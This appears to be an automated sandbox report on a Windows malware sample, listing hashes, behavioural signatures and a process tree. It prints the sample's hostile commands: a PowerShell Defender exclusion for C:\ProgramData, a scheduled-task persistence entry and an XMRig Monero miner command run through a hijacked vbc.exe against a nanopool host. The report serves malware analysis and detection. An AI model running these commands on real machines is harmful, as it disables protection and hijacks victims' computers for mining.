Analysis
-
max time kernel
40s -
max time network
41s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
10-11-2022 20:08
Static task
static1
Behavioral task
behavioral1
Sample
19a474356662325b2059630216338194.exe
Resource
win7-20220812-en
General
-
Target
19a474356662325b2059630216338194.exe
-
Size
1.1MB
-
MD5
19a474356662325b2059630216338194
-
SHA1
5537672751a37401bccf455f651d564bb314a924
-
SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
-
SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
SSDEEP
24576:8tPBwXgZiujGrs4EroJ7WtRDbQMPLqxpw3qt:CigZMsMN4v9jqxpwa
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1364-141-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1364-143-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1364-145-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1364-146-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1364-156-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1364-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
AVPTQBAEW.exepid process 1300 AVPTQBAEW.exe -
Loads dropped DLL 6 IoCs
Processes:
cmd.exeWerFault.exepid process 1340 cmd.exe 1048 WerFault.exe 1048 WerFault.exe 1048 WerFault.exe 1048 WerFault.exe 1048 WerFault.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
AVPTQBAEW.exedescription pid process target process PID 1300 set thread context of 1364 1300 AVPTQBAEW.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1048 1300 WerFault.exe AVPTQBAEW.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 548 timeout.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exeAVPTQBAEW.exepid process 844 powershell.exe 108 powershell.exe 1300 AVPTQBAEW.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
19a474356662325b2059630216338194.exepowershell.exeAVPTQBAEW.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 2016 19a474356662325b2059630216338194.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeDebugPrivilege 1300 AVPTQBAEW.exe Token: SeDebugPrivilege 108 powershell.exe Token: SeLockMemoryPrivilege 1364 vbc.exe Token: SeLockMemoryPrivilege 1364 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 1364 vbc.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
19a474356662325b2059630216338194.execmd.exeAVPTQBAEW.execmd.exedescription pid process target process PID 2016 wrote to memory of 844 2016 19a474356662325b2059630216338194.exe powershell.exe PID 2016 wrote to memory of 844 2016 19a474356662325b2059630216338194.exe powershell.exe PID 2016 wrote to memory of 844 2016 19a474356662325b2059630216338194.exe powershell.exe PID 2016 wrote to memory of 1340 2016 19a474356662325b2059630216338194.exe cmd.exe PID 2016 wrote to memory of 1340 2016 19a474356662325b2059630216338194.exe cmd.exe PID 2016 wrote to memory of 1340 2016 19a474356662325b2059630216338194.exe cmd.exe PID 1340 wrote to memory of 548 1340 cmd.exe timeout.exe PID 1340 wrote to memory of 548 1340 cmd.exe timeout.exe PID 1340 wrote to memory of 548 1340 cmd.exe timeout.exe PID 1340 wrote to memory of 1300 1340 cmd.exe AVPTQBAEW.exe PID 1340 wrote to memory of 1300 1340 cmd.exe AVPTQBAEW.exe PID 1340 wrote to memory of 1300 1340 cmd.exe AVPTQBAEW.exe PID 1300 wrote to memory of 108 1300 AVPTQBAEW.exe powershell.exe PID 1300 wrote to memory of 108 1300 AVPTQBAEW.exe powershell.exe PID 1300 wrote to memory of 108 1300 AVPTQBAEW.exe powershell.exe PID 1300 wrote to memory of 432 1300 AVPTQBAEW.exe cmd.exe PID 1300 wrote to memory of 432 1300 AVPTQBAEW.exe cmd.exe PID 1300 wrote to memory of 432 1300 AVPTQBAEW.exe cmd.exe PID 432 wrote to memory of 1720 432 cmd.exe schtasks.exe PID 432 wrote to memory of 1720 432 cmd.exe schtasks.exe PID 432 wrote to memory of 1720 432 cmd.exe schtasks.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1364 1300 AVPTQBAEW.exe vbc.exe PID 1300 wrote to memory of 1048 1300 AVPTQBAEW.exe WerFault.exe PID 1300 wrote to memory of 1048 1300 AVPTQBAEW.exe WerFault.exe PID 1300 wrote to memory of 1048 1300 AVPTQBAEW.exe WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\19a474356662325b2059630216338194.exe"C:\Users\Admin\AppData\Local\Temp\19a474356662325b2059630216338194.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp734D.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:548 -
C:\ProgramData\WindowsMail\AVPTQBAEW.exe"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"5⤵
- Creates scheduled task(s)
PID:1720 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1364 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1300 -s 20324⤵
- Loads dropped DLL
- Program crash
PID:1048
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
149B
MD57b3877684d54415d8fb7e47bd9d8bc9d
SHA1143808c89105e4eeb673113d72628a7a4db7a11b
SHA256d847b0618f36f1a3154f35e47c9e398cbfb3a33c79d063a521b9e24c17bb9d6d
SHA512e641e8de94d3a9383cb27160eecaf448d86e9f6eb78bef3155457d37e3f3c15dc00a4a0af963a91c82415326979fa6a9cbf270afa454e0335555359c47fdd58b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD555bd36a4e83afe2a72ecce91f2b99043
SHA1eff23101eb684d6b6d401fca1d8610bc508aba1f
SHA256ccbbc4c06b9602ad478e99daf743ae036d70e9a060040a73939488013fee5687
SHA5128f93499aa1c0de5fee750662e00d14baec74505a0daf511d6d59136466fe0c00fcbd7244d22d73845304b96731e182a109848631722dd72f67264255f9ef292c
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4